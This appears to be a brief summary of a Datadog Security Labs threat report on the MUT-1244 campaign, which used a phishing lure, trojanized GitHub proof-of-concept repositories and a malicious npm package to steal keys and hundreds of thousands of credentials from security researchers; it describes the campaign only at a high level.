Getting a taste of your own medicine: Threat actor MUT-1244 targets offensive actors, leaking hundreds of thousands of credentials

Datadog Security Labs details an active campaign attributed to MUT-1244 that targets security researchers and offensive actors via a phishing "kernel upgrade" lure and dozens of trojanized GitHub proof-of-concept repositories (and a malicious npm package). The campaign delivers a common second-stage payload (xmrdropper/related dropper) which backdoors systems and exfiltrates sensitive artifacts—confirmed victims had SSH keys, AWS keys, and command histories stolen—and the actor exfiltrated over 390,000 credentials (believed WordPress) to cloud services; dozens of machines remained actively infected at the time of reporting.